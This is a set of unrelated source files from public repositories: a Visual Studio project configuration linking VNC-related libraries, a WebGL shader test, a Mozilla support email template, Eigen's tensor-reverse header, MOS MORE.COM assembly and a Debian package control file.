DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="0"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="3"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
OmitFramePointers="true"
AdditionalIncludeDirectories=""..\HVNC Lib""
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
RuntimeLibrary="0"
BufferSecurityCheck="false"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="zlib.lib minizip.lib hvnc.lib libvncsrv.lib syslib.lib ws2_32.lib shlwapi.lib Psapi.lib strmiids.lib ntdll.lib Iphlpapi.lib UxTheme.lib vfw32.lib oleacc.lib crypt32.lib version.lib dbghelp.lib"
LinkIncremental="1"
AdditionalLibraryDirectories="..\ntdll\x86;"$(OutDir)""
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="1"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\main.cpp"
>
</File>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>
| {
"pile_set_name": "Github"
} |
/*
** Copyright (c) 2012 The Khronos Group Inc.
**
** Permission is hereby granted, free of charge, to any person obtaining a
** copy of this software and/or associated documentation files (the
** "Materials"), to deal in the Materials without restriction, including
** without limitation the rights to use, copy, modify, merge, publish,
** distribute, sublicense, and/or sell copies of the Materials, and to
** permit persons to whom the Materials are furnished to do so, subject to
** the following conditions:
**
** The above copyright notice and this permission notice shall be included
** in all copies or substantial portions of the Materials.
**
** THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
** EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
** MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
** IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
** CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
** TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
** MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
*/
#ifdef GL_ES
precision mediump float;
#endif
void main()
{
float2 f; // float2 is not a valid datatype
}
| {
"pile_set_name": "Github"
} |
{% extends 'email/base.html' %}
{% block styles %}
{% include 'questions/includes/reply_email_styles.css' %}
.button + a {
display: block;
float: left;
margin: 16px 0 0 16px;
}
{% endblock %}
{% block header %}
<h1>{{ question_title }}</h1>
<img class="avatar" src="{{ profile_avatar(answerer) }}">
<div class="user-meta">
<strong>{{ display_name(answerer) }}</strong>
<span>{{ created }}</span>
</div>
<div class="arrow"></div>
{% endblock %}
{% block content %}
<div class="answer">{{ answer_html }}</div>
{% endblock %}
{% block prefooter %}
<div class="gi-box">
{% trans url="https://support.mozilla.org/kb/avoid-and-report-mozilla-tech-support-scams" %}
<strong>Avoid support scams.</strong>
We will never ask you to call or text a phone number or share personal information.
<a href="{{ url }}">Learn more here.</a>
{% endtrans %}
</div>
<p>
<a class="button" href="https://{{ host }}{{ solution_url }}">{{ _('Mark it as solved') }}</a>
<a href="https://{{ host }}{{ answer_url }}">{{ _('This doesn\'t solve my problem') }}</a>
</p>
<div class="gi-box">
<a href="https://{{ host }}/questions?filter=unsolved">{{ _('Browse for unsolved questions and help a Firefox user') }}</a>
<br/>{{ _("Solving 1 issue helps up to 1,000 users a day!") }}
</div>
<div class="no-reply">
{% trans url="https://%s%s" % (host, answer_url) %}
This email is automatically sent by a robot. Our robot can’t respond to
your question, but our forum contributors can! If you want to respond to
them, please <a href="{{ url }}">click here</a>.
{% endtrans %}
</div>
{% endblock %}
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014 Navdeep Jaitly <[email protected]>
// Benoit Steiner <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_CXX11_TENSOR_TENSOR_REVERSE_H
#define EIGEN_CXX11_TENSOR_TENSOR_REVERSE_H
namespace Eigen {
/** \class TensorReverse
* \ingroup CXX11_Tensor_Module
*
* \brief Tensor reverse elements class.
*
*/
namespace internal {
template<typename ReverseDimensions, typename XprType>
struct traits<TensorReverseOp<ReverseDimensions,
XprType> > : public traits<XprType>
{
typedef typename XprType::Scalar Scalar;
typedef traits<XprType> XprTraits;
typedef typename XprTraits::StorageKind StorageKind;
typedef typename XprTraits::Index Index;
typedef typename XprType::Nested Nested;
typedef typename remove_reference<Nested>::type _Nested;
static const int NumDimensions = XprTraits::NumDimensions;
static const int Layout = XprTraits::Layout;
typedef typename XprTraits::PointerType PointerType;
};
template<typename ReverseDimensions, typename XprType>
struct eval<TensorReverseOp<ReverseDimensions, XprType>, Eigen::Dense>
{
typedef const TensorReverseOp<ReverseDimensions, XprType>& type;
};
template<typename ReverseDimensions, typename XprType>
struct nested<TensorReverseOp<ReverseDimensions, XprType>, 1,
typename eval<TensorReverseOp<ReverseDimensions, XprType> >::type>
{
typedef TensorReverseOp<ReverseDimensions, XprType> type;
};
} // end namespace internal
template<typename ReverseDimensions, typename XprType>
class TensorReverseOp : public TensorBase<TensorReverseOp<ReverseDimensions,
XprType>, WriteAccessors>
{
public:
typedef typename Eigen::internal::traits<TensorReverseOp>::Scalar Scalar;
typedef typename Eigen::NumTraits<Scalar>::Real RealScalar;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename Eigen::internal::nested<TensorReverseOp>::type Nested;
typedef typename Eigen::internal::traits<TensorReverseOp>::StorageKind
StorageKind;
typedef typename Eigen::internal::traits<TensorReverseOp>::Index Index;
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorReverseOp(
const XprType& expr, const ReverseDimensions& reverse_dims)
: m_xpr(expr), m_reverse_dims(reverse_dims) { }
EIGEN_DEVICE_FUNC
const ReverseDimensions& reverse() const { return m_reverse_dims; }
EIGEN_DEVICE_FUNC
const typename internal::remove_all<typename XprType::Nested>::type&
expression() const { return m_xpr; }
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE TensorReverseOp& operator = (const TensorReverseOp& other)
{
typedef TensorAssignOp<TensorReverseOp, const TensorReverseOp> Assign;
Assign assign(*this, other);
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
return *this;
}
template<typename OtherDerived>
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE TensorReverseOp& operator = (const OtherDerived& other)
{
typedef TensorAssignOp<TensorReverseOp, const OtherDerived> Assign;
Assign assign(*this, other);
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
return *this;
}
protected:
typename XprType::Nested m_xpr;
const ReverseDimensions m_reverse_dims;
};
// Eval as rvalue
template<typename ReverseDimensions, typename ArgType, typename Device>
struct TensorEvaluator<const TensorReverseOp<ReverseDimensions, ArgType>, Device>
{
typedef TensorReverseOp<ReverseDimensions, ArgType> XprType;
typedef typename XprType::Index Index;
static const int NumDims = internal::array_size<ReverseDimensions>::value;
typedef DSizes<Index, NumDims> Dimensions;
typedef typename XprType::Scalar Scalar;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename PacketType<CoeffReturnType, Device>::type PacketReturnType;
static const int PacketSize = PacketType<CoeffReturnType, Device>::size;
typedef StorageMemory<CoeffReturnType, Device> Storage;
typedef typename Storage::Type EvaluatorPointerType;
enum {
IsAligned = false,
PacketAccess = TensorEvaluator<ArgType, Device>::PacketAccess,
BlockAccess = NumDims > 0,
PreferBlockAccess = true,
Layout = TensorEvaluator<ArgType, Device>::Layout,
CoordAccess = false, // to be implemented
RawAccess = false
};
typedef internal::TensorIntDivisor<Index> IndexDivisor;
//===- Tensor block evaluation strategy (see TensorBlock.h) -------------===//
typedef internal::TensorBlockDescriptor<NumDims, Index> TensorBlockDesc;
typedef internal::TensorBlockScratchAllocator<Device> TensorBlockScratch;
typedef typename TensorEvaluator<const ArgType, Device>::TensorBlock
ArgTensorBlock;
typedef typename internal::TensorMaterializedBlock<CoeffReturnType, NumDims,
Layout, Index>
TensorBlock;
//===--------------------------------------------------------------------===//
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorEvaluator(const XprType& op,
const Device& device)
: m_impl(op.expression(), device),
m_reverse(op.reverse()),
m_device(device)
{
// Reversing a scalar isn't supported yet. It would be a no-op anyway.
EIGEN_STATIC_ASSERT((NumDims > 0), YOU_MADE_A_PROGRAMMING_MISTAKE);
// Compute strides
m_dimensions = m_impl.dimensions();
if (static_cast<int>(Layout) == static_cast<int>(ColMajor)) {
m_strides[0] = 1;
for (int i = 1; i < NumDims; ++i) {
m_strides[i] = m_strides[i-1] * m_dimensions[i-1];
if (m_strides[i] > 0) m_fastStrides[i] = IndexDivisor(m_strides[i]);
}
} else {
m_strides[NumDims-1] = 1;
for (int i = NumDims - 2; i >= 0; --i) {
m_strides[i] = m_strides[i+1] * m_dimensions[i+1];
if (m_strides[i] > 0) m_fastStrides[i] = IndexDivisor(m_strides[i]);
}
}
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
const Dimensions& dimensions() const { return m_dimensions; }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE bool evalSubExprsIfNeeded(EvaluatorPointerType) {
m_impl.evalSubExprsIfNeeded(NULL);
return true;
}
#ifdef EIGEN_USE_THREADS
template <typename EvalSubExprsCallback>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void evalSubExprsIfNeededAsync(
EvaluatorPointerType, EvalSubExprsCallback done) {
m_impl.evalSubExprsIfNeededAsync(nullptr, [done](bool) { done(true); });
}
#endif // EIGEN_USE_THREADS
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void cleanup() {
m_impl.cleanup();
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index reverseIndex(
Index index) const {
eigen_assert(index < dimensions().TotalSize());
Index inputIndex = 0;
if (static_cast<int>(Layout) == static_cast<int>(ColMajor)) {
EIGEN_UNROLL_LOOP
for (int i = NumDims - 1; i > 0; --i) {
Index idx = index / m_fastStrides[i];
index -= idx * m_strides[i];
if (m_reverse[i]) {
idx = m_dimensions[i] - idx - 1;
}
inputIndex += idx * m_strides[i] ;
}
if (m_reverse[0]) {
inputIndex += (m_dimensions[0] - index - 1);
} else {
inputIndex += index;
}
} else {
EIGEN_UNROLL_LOOP
for (int i = 0; i < NumDims - 1; ++i) {
Index idx = index / m_fastStrides[i];
index -= idx * m_strides[i];
if (m_reverse[i]) {
idx = m_dimensions[i] - idx - 1;
}
inputIndex += idx * m_strides[i] ;
}
if (m_reverse[NumDims-1]) {
inputIndex += (m_dimensions[NumDims-1] - index - 1);
} else {
inputIndex += index;
}
}
return inputIndex;
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE CoeffReturnType coeff(
Index index) const {
return m_impl.coeff(reverseIndex(index));
}
template<int LoadMode>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
PacketReturnType packet(Index index) const
{
EIGEN_STATIC_ASSERT((PacketSize > 1), YOU_MADE_A_PROGRAMMING_MISTAKE)
eigen_assert(index+PacketSize-1 < dimensions().TotalSize());
// TODO(ndjaitly): write a better packing routine that uses
// local structure.
EIGEN_ALIGN_MAX typename internal::remove_const<CoeffReturnType>::type
values[PacketSize];
EIGEN_UNROLL_LOOP
for (int i = 0; i < PacketSize; ++i) {
values[i] = coeff(index+i);
}
PacketReturnType rslt = internal::pload<PacketReturnType>(values);
return rslt;
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
internal::TensorBlockResourceRequirements getResourceRequirements() const {
const size_t target_size = m_device.lastLevelCacheSize();
// Block evaluation reads underlying memory in reverse order, and default
// cost model does not properly catch this in bytes stored/loaded.
return internal::TensorBlockResourceRequirements::skewed<Scalar>(
target_size)
.addCostPerCoeff({0, 0, 24});
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorBlock
block(TensorBlockDesc& desc, TensorBlockScratch& scratch,
bool /*root_of_expr_ast*/ = false) const {
// TODO(ezhulenev): If underlying tensor expression supports and prefers
// block evaluation we must use it. Currently we use coeff and packet
// access into the underlying tensor expression.
// static const bool useBlockAccessForArgType =
// TensorEvaluator<ArgType, Device>::BlockAccess &&
// TensorEvaluator<ArgType, Device>::PreferBlockAccess;
static const bool isColMajor =
static_cast<int>(Layout) == static_cast<int>(ColMajor);
static const Index inner_dim_idx = isColMajor ? 0 : NumDims - 1;
const bool inner_dim_reversed = m_reverse[inner_dim_idx];
// Offset in the output block.
Index block_offset = 0;
// Offset in the input Tensor.
Index input_offset = reverseIndex(desc.offset());
// Initialize output block iterator state. Dimension in this array are
// always in inner_most -> outer_most order (col major layout).
array<BlockIteratorState, NumDims> it;
for (int i = 0; i < NumDims; ++i) {
const int dim = isColMajor ? i : NumDims - 1 - i;
it[i].size = desc.dimension(dim);
it[i].count = 0;
it[i].reverse = m_reverse[dim];
it[i].block_stride =
i == 0 ? 1 : (it[i - 1].size * it[i - 1].block_stride);
it[i].block_span = it[i].block_stride * (it[i].size - 1);
it[i].input_stride = m_strides[dim];
it[i].input_span = it[i].input_stride * (it[i].size - 1);
if (it[i].reverse) {
it[i].input_stride = -1 * it[i].input_stride;
it[i].input_span = -1 * it[i].input_span;
}
}
// If multiple inner dimensions have the same reverse flag, check if we can
// merge them into a single virtual inner dimension.
int effective_inner_dim = 0;
for (int i = 1; i < NumDims; ++i) {
if (it[i].reverse != it[effective_inner_dim].reverse) break;
if (it[i].block_stride != it[effective_inner_dim].size) break;
if (it[i].block_stride != numext::abs(it[i].input_stride)) break;
it[i].size = it[effective_inner_dim].size * it[i].size;
it[i].block_stride = 1;
it[i].input_stride = (inner_dim_reversed ? -1 : 1);
it[i].block_span = it[i].block_stride * (it[i].size - 1);
it[i].input_span = it[i].input_stride * (it[i].size - 1);
effective_inner_dim = i;
}
eigen_assert(it[effective_inner_dim].block_stride == 1);
eigen_assert(it[effective_inner_dim].input_stride ==
(inner_dim_reversed ? -1 : 1));
const Index inner_dim_size = it[effective_inner_dim].size;
// Prepare storage for the materialized reverse result.
const typename TensorBlock::Storage block_storage =
TensorBlock::prepareStorage(desc, scratch);
CoeffReturnType* block_buffer = block_storage.data();
while (it[NumDims - 1].count < it[NumDims - 1].size) {
// Copy inner-most dimension data from reversed location in input.
Index dst = block_offset;
Index src = input_offset;
// NOTE(ezhulenev): Adding vectorized path with internal::preverse showed
// worse results in benchmarks than a simple coefficient loop.
if (inner_dim_reversed) {
for (Index i = 0; i < inner_dim_size; ++i) {
block_buffer[dst] = m_impl.coeff(src);
++dst;
--src;
}
} else {
for (Index i = 0; i < inner_dim_size; ++i) {
block_buffer[dst] = m_impl.coeff(src);
++dst;
++src;
}
}
// For the 1d tensor we need to generate only one inner-most dimension.
if ((NumDims - effective_inner_dim) == 1) break;
// Update offset.
for (Index i = effective_inner_dim + 1; i < NumDims; ++i) {
if (++it[i].count < it[i].size) {
block_offset += it[i].block_stride;
input_offset += it[i].input_stride;
break;
}
if (i != NumDims - 1) it[i].count = 0;
block_offset -= it[i].block_span;
input_offset -= it[i].input_span;
}
}
return block_storage.AsTensorMaterializedBlock();
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorOpCost costPerCoeff(bool vectorized) const {
double compute_cost = NumDims * (2 * TensorOpCost::AddCost<Index>() +
2 * TensorOpCost::MulCost<Index>() +
TensorOpCost::DivCost<Index>());
for (int i = 0; i < NumDims; ++i) {
if (m_reverse[i]) {
compute_cost += 2 * TensorOpCost::AddCost<Index>();
}
}
return m_impl.costPerCoeff(vectorized) +
TensorOpCost(0, 0, compute_cost, false /* vectorized */, PacketSize);
}
EIGEN_DEVICE_FUNC typename Storage::Type data() const { return NULL; }
#ifdef EIGEN_USE_SYCL
// binding placeholder accessors to a command group handler for SYCL
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void bind(cl::sycl::handler &cgh) const {
m_impl.bind(cgh);
}
#endif
protected:
Dimensions m_dimensions;
array<Index, NumDims> m_strides;
array<IndexDivisor, NumDims> m_fastStrides;
TensorEvaluator<ArgType, Device> m_impl;
ReverseDimensions m_reverse;
const Device EIGEN_DEVICE_REF m_device;
private:
struct BlockIteratorState {
BlockIteratorState()
: size(0),
count(0),
reverse(false),
block_stride(0),
block_span(0),
input_stride(0),
input_span(0) {}
Index size;
Index count;
bool reverse;
Index block_stride;
Index block_span;
Index input_stride;
Index input_span;
};
};
// Eval as lvalue
template <typename ReverseDimensions, typename ArgType, typename Device>
struct TensorEvaluator<TensorReverseOp<ReverseDimensions, ArgType>, Device>
: public TensorEvaluator<const TensorReverseOp<ReverseDimensions, ArgType>,
Device> {
typedef TensorEvaluator<const TensorReverseOp<ReverseDimensions, ArgType>,
Device> Base;
typedef TensorReverseOp<ReverseDimensions, ArgType> XprType;
typedef typename XprType::Index Index;
static const int NumDims = internal::array_size<ReverseDimensions>::value;
typedef DSizes<Index, NumDims> Dimensions;
enum {
IsAligned = false,
PacketAccess = TensorEvaluator<ArgType, Device>::PacketAccess,
BlockAccess = false,
PreferBlockAccess = false,
Layout = TensorEvaluator<ArgType, Device>::Layout,
CoordAccess = false, // to be implemented
RawAccess = false
};
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorEvaluator(const XprType& op,
const Device& device)
: Base(op, device) {}
typedef typename XprType::Scalar Scalar;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename PacketType<CoeffReturnType, Device>::type PacketReturnType;
static const int PacketSize = PacketType<CoeffReturnType, Device>::size;
//===- Tensor block evaluation strategy (see TensorBlock.h) -------------===//
typedef internal::TensorBlockNotImplemented TensorBlock;
//===--------------------------------------------------------------------===//
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
const Dimensions& dimensions() const { return this->m_dimensions; }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(Index index) {
return this->m_impl.coeffRef(this->reverseIndex(index));
}
template <int StoreMode> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
void writePacket(Index index, const PacketReturnType& x) {
EIGEN_STATIC_ASSERT((PacketSize > 1), YOU_MADE_A_PROGRAMMING_MISTAKE)
eigen_assert(index+PacketSize-1 < dimensions().TotalSize());
// This code is pilfered from TensorMorphing.h
EIGEN_ALIGN_MAX CoeffReturnType values[PacketSize];
internal::pstore<CoeffReturnType, PacketReturnType>(values, x);
EIGEN_UNROLL_LOOP
for (int i = 0; i < PacketSize; ++i) {
this->coeffRef(index+i) = values[i];
}
}
};
} // end namespace Eigen
#endif // EIGEN_CXX11_TENSOR_TENSOR_REVERSE_H
| {
"pile_set_name": "Github"
} |
include page.inc
title MORE - a filter to paginate piped output
subttl MORE Development Specification
;-----------------------------------------------------------------------;
; ;
; Development Specification ;
; ;
; ;
; Program Name: MORE.COM Assigned to: Martin Stitt ;
; Module Name: MORE Assign date: 08/06/86 ;
; Entry Points: MORE Completed: 8/8/86 ;
; Entry From: MOS command processor ;
; Entry Method: ;
; Purpose: ;
; Refer To: ;
; Last Update: ;
; ;
;   Description:  Filter the character stream from the standard input   ;
; device by counting the number of display lines and providing a pause ;
; each time the display fills up. This process must account for ;
; control codes which do not advance the cursor, lines longer than the ;
; current screen width and the current screen width (80, 40 or 20). ;
;-----------------------------------------------------------------------;
;------------------------- Revision Log -------------------------------;
; ;
; BWR 11/28/89 Marked messages for foreign language ;
; translation. ;
;----------------------------------------------------------------------;
subttl MORE macros, equates, data
page
;dos function calls
readfil equ 3fh
writfil equ 40h
stdin equ 0000
stdout equ 0001
stderr equ 0002
prnstr equ 09h
prnchr equ 02h
duphndl equ 45h
quit equ 4ch
true equ 0ffh
false equ 0
cr equ 13
lf equ 10
eof equ 1ah
tab equ 9
bell equ 7
bs equ 8
maxlins equ 25
; MOS: invoke a MOS/DOS system service -- function number 'fn' goes in AH,
; then int 21h is issued.  Other registers must be set up by the caller.
MOS MACRO fn
	mov	ah,fn
	int	21h
	endm
; PushRegSet / PopRegSet: save and later restore the flags, all general
; registers and the DS/ES segment registers.  PopRegSet pops in the exact
; reverse order of PushRegSet, so the two must always be used as a pair.
PushRegSet MACRO
	pushf
	push	ax
	push	bx
	push	cx
	push	dx
	push	di
	push	si
	push	bp
	push	ds
	push	es
	ENDM
PopRegSet MACRO
	pop	es
	pop	ds
	pop	bp
	pop	si
	pop	di
	pop	dx
	pop	cx
	pop	bx
	pop	ax
	popf
	ENDM
; Ljcxz / Lje / Ljz / Ljnz: "long" conditional jumps.  8086 conditional
; jumps reach only +/-127 bytes, so each macro branches to a nearby stub
; which then reaches the real target with an unconditional (unlimited
; range) JMP.  (Ljz appears unused in this file but is kept for symmetry.)
Ljcxz MACRO jmpdest ; Long jumps
	LOCAL lp1,lp2
	jcxz	lp1
	jmp	lp2
lp1:	jmp	jmpdest
lp2:
	ENDM
Lje MACRO jmpdest
	LOCAL lp1,lp2
	je	lp1
	jmp	lp2
lp1:	jmp	jmpdest
lp2:
	ENDM
Ljz MACRO jmpdest
	LOCAL lp1,lp2
	jz	lp1
	jmp	lp2
lp1:	jmp	jmpdest
lp2:
	ENDM
Ljnz MACRO jmpdest
	LOCAL lp1,lp2
	jnz	lp1
	jmp	lp2
lp1:	jmp	jmpdest
lp2:
	ENDM
subttl main code for MORE
page
codeseg SEGMENT
ORG 0100h
ASSUME CS:CODESEG,DS:CODESEG
start:
	jmp	EntryPnt		; skip over the data declarations below
ermsg1	db	"MORE: Insufficient memory available! ",cr,lf	;@@XLAT
erm1ln	db	$ - ermsg1		; length of ermsg1, computed at assembly time
moremsg	db	"Continued . . .$"	;@@XLAT
eolmsg	db	cr,lf,"$"		; "$"-terminated CR/LF for DOS fn 09h
maxcols	db	?			; screen width in columns, read from BIOS at startup
lincntr	db	1			; current display line (1-based)
chrcntr	db	1			; current column within the line (1-based)
;-----------------------------------------------------------------------;
; DispEOL -- send a CR/LF pair to the display via DOS print-string      ;
; (function 09h).  Clobbers AH and DX.                                  ;
;-----------------------------------------------------------------------;
DispEOL	PROC	NEAR
	lea	dx,eolmsg		; DS:DX -> "$"-terminated CR/LF string
	MOS	prnstr
	ret
DispEOL	ENDP
subttl main procedure, filter data stream
page
;--------------------------------------------------------------------;
;       Main procedure for the MOS MORE command.                     ;
;       Verifies the MOS version, checks free memory, then reads     ;
;       standard input in 4K chunks and pauses after each full       ;
;       screen of output.                                            ;
;--------------------------------------------------------------------;
EntryPnt:
	jmp	Vrchk1			; skip around the data
version label byte
	include	version.inc
vermsg	db	13,10,'Improper MOS Version.',13,10,'$'	;@@XLAT
Vrchk1:
	mov	ah,30h			; DOS get-version call
	mov	bx,ax			; read the MOS version number
	mov	cx,ax
	mov	dx,ax
	int	21h
	cmp	ax,word ptr [version]	; must match the build-time version
	jne	Vrchk2			; constants from version.inc
	cmp	bx,word ptr [version+2]
	je	Vrchk3
Vrchk2:
	lea	dx,[vermsg]		; report mismatch
	push	cs
	pop	ds
	mov	ah,9
	int	21h
	mov	al,2			; errorlevel 2
	mov	ah,4ch			; and terminate
	int	21h
Vrchk3:
;
; develop a paragraph count of available memory from the end of this program
; to the end of total free memory. Report and exit if not enough room for
; this program's buffer needs
;
	lea	bx,EndOfProg
	test	bx,0fh
	pushf
	mov	cl,4
	shr	bx,cl			; calc paragraphs for offset
	popf
	jz	SkipInc
	inc	bx			; round up to a whole paragraph
SkipInc:
	mov	ax,cs
	add	bx,ax			; add to paragraphs in segment
	int	12h			; read number of Kbytes total memory
	mov	cl,6
	shl	ax,cl			; convert Kbytes to paragraphs (x64)
	sub	ax,bx			; and find free paragraphs
	cmp	ax,256			; need 256 paragraphs for 4k buffer
	jae	EnoughMem
	lea	dx,ermsg1		; not enough memory
	mov	bx,stderr		; report and quit
	mov	cl,erm1ln
	xor	ch,ch
	MOS	writfil
	MOS	quit
EnoughMem:
	mov	ah,0fh			; read video mode to get number of
	int	10h			; columns for display
	mov	[maxcols],ah
	call	DispEOL
GetData:
	lea	dx,EndOfProg		; read a buffer of data from standard input
	mov	si,dx			; (buffer lives just past the program image)
	mov	cx,4096
	mov	bx,stdin
	MOS	readfil
	mov	cx,ax			; CX = bytes actually read; zero means EOF
	Ljcxz	CleanExit
	cld
ReadChar:
	lodsb				; read a character from the buffer
	cmp	al,eof			; and test it to see if it is in the
	Lje	CleanExit		; set of control characters which are
	cmp	al,cr			; not displayable. Special accounting
	Lje	Rc1			; must be done for non-displayable control
	cmp	al,lf			; characters to ensure only a screen full
	Lje	Rc2			; of characters is passed at a time.
	cmp	al,bs
	Lje	Rc3
	cmp	al,tab
	Lje	Rc4
	cmp	al,bell
	Lje	WriteChar
	inc	[chrcntr]		; must be a displayable character
	mov	bh,[maxcols]
	cmp	[chrcntr],bh
	jng	WriteChar
	inc	[lincntr]		; if chrcntr > maxcols then advance the line
	mov	[chrcntr],1
WriteChar:
	mov	dl,al			; send the character to standard output
	MOS	prnchr
	mov	bl,al			; save character for the lf check below
	cmp	[lincntr],maxlins
	jl	Wc1
	lea	dx,moremsg		; if a screen full has been sent, put up
	MOS	prnstr			; message and pause for key.
	mov	ah,1
	int	16h
DrainKeyBuf:
	jz	Drained			; Use BIOS to read keyboard directly rather
	mov	ah,0			; than a MOS call because of redirection.
	int	16h
	mov	ah,1
	int	16h
	jmp	DrainKeyBuf
Drained:
	mov	ah,0			; BIOS call to wait for key
	int	16h
	cmp	al,3			; check for ^C
	je	CleanExit
	call	DispEOL
	mov	[lincntr],1		; re-init counters
	mov	[chrcntr],1
	cmp	bl,lf
	je	Wc1
	dec	si
	inc	cx
Wc1:
	dec	cx
	Ljcxz	GetData			; buffer empty, get another
	jmp	ReadChar		; read another character from the buffer
Rc1:
	mov	[chrcntr],1		; reset character counter when a cr is
	jmp	WriteChar		; detected
Rc2:
	inc	[lincntr]		; advance line counter when a lf is detected
	jmp	WriteChar
Rc3:
	dec	[chrcntr]		; backup character counter when a bs is
	Ljnz	WriteChar		; detected (never below column 1)
	inc	[chrcntr]
	jmp	WriteChar
Rc4:
	mov	ah,[chrcntr]		; when a tab character is found, anticipate
	add	ah,7			; how the display function will expand the
	and	ah,0f8h			; tab to the next column of the set:
	inc	ah			; 1,9,17,25,33... (every 8th col)
	mov	[chrcntr],ah
	jmp	WriteChar
CleanExit:
	xor	al,al			; errorlevel 0
ExitMore:
	MOS	quit			; terminate program, return to MOS
EndOfProg LABEL BYTE
codeseg ENDS
END start
| {
"pile_set_name": "Github"
} |
Package: d-lan-all-in-one
Version: _VERSION_
Section: base
Priority: optional
Architecture: _ARCH_
Installed-Size: _INST_SIZE_
Depends: libprotobuf9 (_DEP_PROTOBUF_), libqt5core5a (_DEP_QTCORE_), libqt5gui5 (_DEP_QTGUI_), libqt5network5 (_DEP_QTNETWORK_), libqt5widgets5 (_DEP_QTWIDGETS_), libqt5xml5 (_DEP_QTXML_), libc6 (_DEP_LIBC_), libstdc++6 (_DEP_LIBSTDCPP_), libgcc1 (_DEP_LIBGCC_)
Maintainer: Hervé Martinet <[email protected]>
Homepage: http://www.d-lan.net
Description: A free LAN file sharing software.
The goal is to easily exchange a large amount of data
in a local area network environment like a LAN-Party.
 After you launch D-LAN, you will automatically see all other people
 and their shared files without any special configuration.
| {
"pile_set_name": "Github"
} |
